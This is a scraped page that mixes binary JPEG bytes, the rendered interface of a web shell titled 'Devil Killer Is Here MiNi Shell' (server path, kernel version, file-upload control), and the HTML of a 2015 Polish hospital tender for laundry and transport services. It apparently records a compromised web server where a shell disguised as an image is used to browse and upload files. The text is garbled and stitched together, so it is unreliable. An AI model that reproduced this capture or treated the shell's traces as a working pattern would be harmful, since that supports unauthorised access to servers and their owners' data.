JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150820/123909-N-2015.html

<p class="kh_header"><b>Białogard: Przetarg nieograniczony na
świadczenie usług prania, czyszczenia na sucho, prasowania wraz z usługą transportu dla Regionalnego Centrum Medycznego w Białogardzie Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 123909 - 2015; data zamieszczenia: 20.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Medyczne w Białogardzie Spółka z o.o. , ul. Chopina 29, 78-200 Białogard, woj. zachodniopomorskie, tel. 94 311 37 02, faks 94 311 37 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalbilogard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na
świadczenie usług prania, czyszczenia na sucho, prasowania wraz z usługą transportu dla Regionalnego Centrum Medycznego w Białogardzie Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> (1)	Przedmiotem niniejszego zamówienia jest świadczenie usług prania bielizny, odzieży (obejmujących pranie wodne, wodno - chemiczne dwustronne maglowanie, suszenie oraz dezynfekcję termiczną lub termiczno-chemiczną) i materacy.

(2)	Zakres świadczonych usług obejmuje transport z i do obu lokalizacji Regionalnego Centrum Medycznego w Białogardzie Sp. z o.o. przy ul. Chopina 29 oraz przy ul. Szpitalnej 7 (odbiór brudnej bielizny, zwrot czystej bielizny i materacy) odpowiednio zapakowanej wraz 
z załadunkiem i rozładunkiem.

(3)	Zakres rzeczowy i serwisowy:
a)	pranie płaskie: 
zakres rzeczowy: asortyment: bielizna pościelowa: poszwy, poszewki, prześcieradła, podkłady płócienne, podkłady gumowane, prześcieradła gumowane, pieluchy, worki płócienne, pidżamy, szlafroki, koszule nocne, koszule zabiegowe, ręczniki, ścierki, obrusy, serwetki, pokrowce na materace, pasy bezpieczeństwa, kaftany bezpieczeństwa, parawany, pokrowce ochronne na odzież pacjentów, chusty gazowe;
zakres serwisowy: pranie, maglowanie, drobne naprawy krawieckie, pakowane w torby tekstylne składane standardowo w kostkę;

b)	pranie fasonówki:
zakres rzeczowy (asortyment): fartuchy pielęgniarskie, spódnice, sukienki, spodnie, bluzy lekarskie;
zakres serwisowy: pranie, prasowanie, krochmalenie, pakowanie w folie; 

c)	ubrania robocze:
zakres rzeczowy (asortyment): kombinezon z elanobawełny, bluza z elanobawełny, koszula flanelowa, spodnie, koszulki T, kurtki ocieplane (jak Pogotowie ratunkowe);
zakres serwisowy: pranie, prasowanie, składanie w kostkę i pakowane w torby tekstylne; 

d)	ubrania dziecięce:
zakres rzeczowy (asortyment): ubrania dziecięce i noworodkowe (kocyki, rożki, śpiochy, kaftaniki)
zakres serwisowy: pranie, prasowanie, pakowanie w folie; 

e)	firany:
zakres serwisowy: pranie, prasowanie, składanie, pakowanie w torby tekstylne;

f)	koce i kołdry:
zakres serwisowy: pranie, suszenie, składanie, pakowanie w torby tekstylne;

g)	materace:
zakres serwisowy: pranie i suszenie, składanie, pakowanie w folię;

Uwaga!!! nie zdejmować pokrowca z materaca, przed oddaniem dla Zamawiającego pokrowiec winien być na materacu!;

h)	Poduszki + poduszki Jaś:
zakres serwisowy: pranie, suszenie, pakowanie w torby tekstylne;

i)	inne:
zakres rzeczowy (asortyment): kołnierze ortopedyczne, maty podnośnikowe, podgłówki, podnóżki (gąbka+materiał), siedziska na wózki inwalidzkie, wałki, podgłówki z otworem;
zakres serwisowy: pranie, suszenie, pakowanie w folię;

(4)	Rzeczy mocno zniszczone, nie nadające się do reperacji, przeznaczone będą do kasacji, którą wykonają pracownicy Zamawiającego. Przedmioty przeznaczone do kasacji winny być wyprane.

(5)	Przewidywana, szacunkowa ilość pranej bielizna w roku to około 68.850,00 kg.

(6)	Wykonawca zobowiązany jest do respektowania warunków prania określonych przez producenta odzieży.

(7)	Zamawiający informuje, iż ilości bielizny i materacy ujęte w przedmiotowym zamówieniu są  wartościami szacunkowymi, służącymi do prawidłowego skalkulowania ceny oferty, porównania ofert i wyboru oferty najkorzystniejszej. 

(8)	Wykonawca będzie zobowiązany do wykonania usług stanowiących przedmiot niniejszego postępowania zgodnie z obowiązującymi w tym zakresie przepisami i zaleceniami, 
w szczególności:
a)	ustawą z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi (Dz.U. 2008 nr 234 poz. 1570),
b)	Rozporządzeniem Ministra Gospodarki z dnia 27 kwietnia 2000 r. w sprawie bezpieczeństwa i higieny pracy w pralniach i farbiarniach (Dz. U. 2000 nr 40 poz. 469),
c)	Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. 
w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz. U. 1997 nr 129 poz. 844) z pózn. zm.,
d)	Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. 2002 nr 75 poz. 690) z pózn. zm.

(9)	Wykonawca będzie zobowiązany do wykonywania usług stanowiących przedmiot postępowania profesjonalnymi środkami piorąco-dezynfekcyjnymi zapewniającymi 100% czystość mikrobiologiczną, posiadającymi atesty i certyfikaty dopuszczające do stosowania 
i obrotu na terenie Polski.

(10)	Wykonawca zobowiązany jest stosować do realizacji umowy środki dezynfekujące działające na bakterie, łącznie z prątkami gruźlicy, grzyby, wirusy oraz spory (Clostridium difficile, Clostridium perfringens).

(11)	Wykonawca przekaże Zamawiającemu do 7 dni po zawarciu umowy wykaz środków piorących i dezynfekujących, które będzie stosował do realizacji zamówienia. Wykonawca będzie zobowiązany do pisemnego powiadomienia Zamawiającego w terminie 7 dni 
o każdorazowej zmianie środka piorącego i dezynfekującego.

(12)	Zamawiający zastrzega sobie prawo wglądu do aktualnych kart charakterystyki środków piorących i dezynfekcyjnych i do protokołów kontroli przeprowadzanych przez nadzór sanitarno-epidemiologiczny.

(13)	Bielizna i odzież pochodząca od Zamawiającego nie może być mieszana z bielizną i odzieżą pochodzącą z innych placówek.

(14)	Bielizna i odzież czysta dostarczana z pralni do Punktu odbioru nie może być wilgotna.

(15)	Pranie z oddziału noworodkowego musi być przeprowadzone w wydzielonej pralnicy.

(16)	Pranie bielizny pochodzącej od chorych zakaźnie, zakażonych lub podejrzewanych 
o zakażenie, zanieczyszczone kałem, krwią, lub innymi wydzielinami pakowane będzie 
w worki koloru czerwonego z napisem na worku: skażona, ponadto będzie odbywać się 
w oddzieleniu od pozostałej bielizny.

(17)	Organizacja transportu, załadunku i rozładunku bielizny szpitalnej będzie odbywać się 
w warunkach zapewniających odpowiednie warunki sanitarne i wykluczających kontakt bielizny czystej z brudną. 

(18)	Zamawiający wymaga, aby wykonawca dysponował zamykanymi środkami transportu oddzielnymi do brudnej i czystej bielizny. W sytuacjach, kiedy transport będzie odbywał się jednym samochodem, w pierwszej kolejności dowożona będzie bielizna czysta, a następnie odbierana brudna. Po transporcie bielizny brudnej przestrzeń ładunkową należy ponownie zdezynfekować.

(19)	Pojazd powinien być wyposażony w środki do dezynfekcji rąk i powierzchni oraz jednorazową odzież dla osoby obsługującej.

(20)	Zamawiający zastrzega sobie prawo do kontroli sposobu oraz warunków wykonywania usługi pod względem jakościowym, w tym do wykonania na koszt Wykonawcy doraźnych badań czystości mikrobiologicznej wypranego i wydezynfekowanego asortymentu np. w przypadku dochodzenia epidemiologicznego.

(21)	Wykonawca będzie zobowiązany do wykonywania usługi, codziennie od poniedziałku do soboty.

(22)	Wykonawca będzie zobowiązany do odbioru bielizny i materacy codziennie w godzinach 8:00 - 10:00 rano.

(23)	Wykonawca będzie zobowiązany do zwrotu bielizny, odzieży i materacy wypranych 
i wydezynfekowanych, zapakowanych z zachowaniem podziału na oddziały pobranych poprzedniego dnia najpóźniej do godziny 10:00 rano dnia następnego.

(24)	Pranie i zwrot bielizny oraz materacy następować będzie na podstawie każdorazowo sporządzonej karty przekazania. Karta przekazania powinna zawierać wyszczególnienie rodzajów bielizny i materacy pobranej do prania wraz z podaniem ilości (w sztukach), wagi czystej bielizny oraz podpisy przedstawiciela Wykonawcy i Zamawiającego.

(25)	Zamawiający ma prawo reklamować każdorazowe stwierdzenie braków ilościowych lub niezgodności asortymentu bezpośrednio po odbiorze upranych rzeczy, a Wykonawca winien odpowiedzieć na reklamację nie później niż w terminie do 24 godzin.

(26)	W przypadku stwierdzenia jakichkolwiek uszkodzeń bielizny i materacy przekazywanej do prania, Wykonawca będzie zobowiązany do zaznaczenia rodzaju uszkodzenia przy odbiorze bielizny i materacy w karcie przekazania. W przypadku nie dopełnienia tego obowiązku Zamawiający przyjmie, iż bielizna i materace oddane do prania były w stanie nieuszkodzonym i obciąży Wykonawcę kosztami wymiany bielizny na nieuszkodzoną.

(27)	Wykonawca nie może dopuścić w procesie technologicznym do powstania przebarwień 
i uszkodzeń powierzonego asortymentu.

(28)	Bielizna, która została zwrócona Wykonawcy przez Zamawiającego z powodu złego wykonania usługi (z widocznymi plamami, mokra, niedoprasowana, zabarwiona) musi być ponownie poddana przez Wykonawcę procesowi prania i dostarczona do magazynu bielizny Zamawiającego na własny koszt i własnym transportem.

(29)	Zamawiający zastrzega sobie prawo kontroli zgodności wykonywanej usługi z treścią SIWZ 
w siedzibie Wykonawcy, w wybranym terminie po uprzednim zawiadomieniu Wykonawcy.

(30)	Zamawiający zobowiązuje Wykonawcę do zwrotu po praniu/dezynfekcji bielizny i materacy stanowiących własność Zamawiającego.

(31)	Ilości określone przez Zamawiającego w załączniku nr 1 do SIWZ (formularz oferty), 
w ramach realizacji umowy mogą ulec zmianie w zależności od rzeczywistych potrzeb Zamawiającego, z zastrzeżeniem, iż wartość oferty wybranego Wykonawcy nie zostanie przekroczona.

(32)	Zamawiający wymaga, aby usługi stanowiące przedmiot zamówienia wykonywane były środkami piorąco-dezynfekcyjnymi zapewniającymi 100% czystość bakteriologiczną, posiadającymi atesty i certyfikaty dopuszczające do stosowania i obrotu na terenie Polski.

(33)	Oznaczenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV) - 98310000-9 - Usługi prania i czyszczenia na sucho.

(34)	Wykonawca będzie zobowiązany wykonywać zamówienie zgodnie z niniejszą SIWZ, zawartą umową i ofertą przetargową.

(35)	Wykonawca zapewni na własny koszt odbiór oraz dostawę przedmiotu zamówienia z i do obu lokalizacji Zamawiającego, tj. Regionalnego Centrum Medycznego w Białogardzie Sp. z o.o. przy ul. Chopina 29 oraz przy ul. Szpitalnej 7. 

(36)	W incydentalnych sytuacjach wymagających wykonania usługi ekspresowej, Wykonawca zobowiąże się do wykonania tej usługi na rzecz Zamawiającego w cenie usługi przez niego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku określonego przez Zamawiającego nastąpi na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp oraz zezwolenia na pranie bielizny szpitalnej (lub pozytywną opinię) właściwego organu sanitarno-epidemiologicznego - Zamawiający uzna warunek za spełniony jeżeli Wykonawca załączy do oferty wypełnione i podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik do SIWZ oraz wykaże, że posiada zezwolenie na pranie bielizny szpitalnej (lub pozytywną opinię) właściwego organu sanitarno-epidemiologicznego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku określonego przez Zamawiającego nastąpi na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp - Zamawiający uzna warunek za spełniony jeżeli Wykonawca załączy do oferty wypełnione i podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku określonego przez Zamawiającego nastąpi na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp oraz wykazu środków transportu przystosowanych do przewozu bielizny szpitalnej dopuszczonych do używania przez odpowiednie służby sanitarno-epidemiologiczne i oświadczenia o dysponowaniu pralnią posiadającą barierę higieniczną poprzez podział na brudną i czystą zapewniającą całkowite wyeliminowanie stykania się bielizny czystej i brudnej Zamawiający uzna warunek za spełniony jeżeli Wykonawca załączy do oferty wypełnione i podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik do SIWZ oraz wykaże, że dysponuje: a) min. jednym środkiem transportu przystosowanym do przewozu bielizny szpitalnej, dopuszczonym do używania przez odpowiednie służby sanitarno-epidemiologiczne - wykaz środków transportu przystosowanych do przewozu bielizny szpitalnej dopuszczonych do używania przez odpowiednie służby sanitarno-epidemiologiczne - załącznik do SIWZ. b) dysponuje pralnią posiadającą barierę higieniczną poprzez podział na brudną i czystą zapewniającą całkowite wyeliminowanie stykania się bielizny czystej i brudnej - oświadczenie o dysponowaniu pralnią posiadającą barierę higieniczną poprzez podział na brudną i czystą zapewniającą całkowite wyeliminowanie stykania się bielizny czystej i brudnej - załącznik do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku określonego przez Zamawiającego nastąpi na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp - Zamawiający uzna warunek za spełniony jeżeli Wykonawca załączy do oferty wypełnione i podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku określonego przez Zamawiającego nastąpi na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp - Zamawiający uzna warunek za spełniony jeżeli Wykonawca załączy do oferty wypełnione i podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wykaz środków transportu przystosowanych do przewozu bielizny szpitalnej dopuszczonych do używania przez odpowiednie służby sanitarno-epidemiologiczne -wg wzoru na załączniku do SIWZ. 2) oświadczenie o dysponowaniu pralnią posiadającą barierę higieniczną poprzez podział na brudną i czystą zapewniającą całkowite wyeliminowanie stykania się bielizny czystej i brudnej - załącznik do SIWZ W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca przedłoży wraz z ofertą: a) oświadczenie, iż środki piorące i dezynfekujące użyte do realizacji zamówienia są dopuszczone do stosowania w zakładach opieki zdrowotnej i gwarantują właściwą jakość prania pod względem bakteriologicznym i higienicznym oraz są zgodne z Ustawą z dnia 13 września 2002 roku o produktach biobójczych (DZ.U. Nr 175,poz.1433 z późn. zmianami) - załącznik do SIWZ; b) oświadczenie, że środki stosowane w procesie prania i dezynfekcji wybielania nie mogą niszczyć tkanin i powodować przyspieszonego zużycia bielizny i odzieży - załącznik do SIWZ; c) Pozytywna opinię Instytutu Matki i Dziecka lub Centrum Zdrowia Dziecka potwierdzającą, że preparaty stosowane do prania i chemiczno-termicznej dezynfekcji bielizny mogą być stosowane do prania bielizny niemowlęcej;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Czas wykonania usługi ekspresowej - 10</li>
<li>3 - Czas cyklu od odbioru do dostawy - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany. 2. Cena podana w ofercie nie ulega zmianie w trakcie realizacji umowy, poza sytuacją ustawowej zmiany stawki podatku od towarów i usług (VAT), przy czym zmianie ulegną wyłącznie ceny jednostkowe brutto, natomiast ceny jednostkowe netto pozostaną bez zmian. 3. Umowę zawiera się na czas określony z zastrzeżeniem możliwości aneksowania umowy w przypadku nie wyczerpania umowy wartościowo w okresie jej obowiązywania. 4. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość zmian postanowień umowy w poniższym zakresie: a) zmiany formy organizacyjno - prawnej strony umowy na zasadach określonych w Kodeksie Cywilnym, b) zmiany częstotliwości lub miejsca świadczenia usługi; c) zmiany stawki podatku od towarów i usług (VAT), d) zmiany sposobu przekazywania przedmiotu zamówienia w celu wykonania usługi, e) zmiany przepisów prawa mających wpływ na warunki umowy, f) oraz w przypadku gdy zmiany nie spowodują negatywnych konsekwencji dla Zamawiającego. 5. Zmiana umowy dokonana z naruszeniem pkt 1-4 podlega unieważnieniu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalbialogard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Medyczne w Białogardzie Sp. z o.o. ul. Chopina 29, 78-200 Białogard, IIIp. - pokój 305.</p>
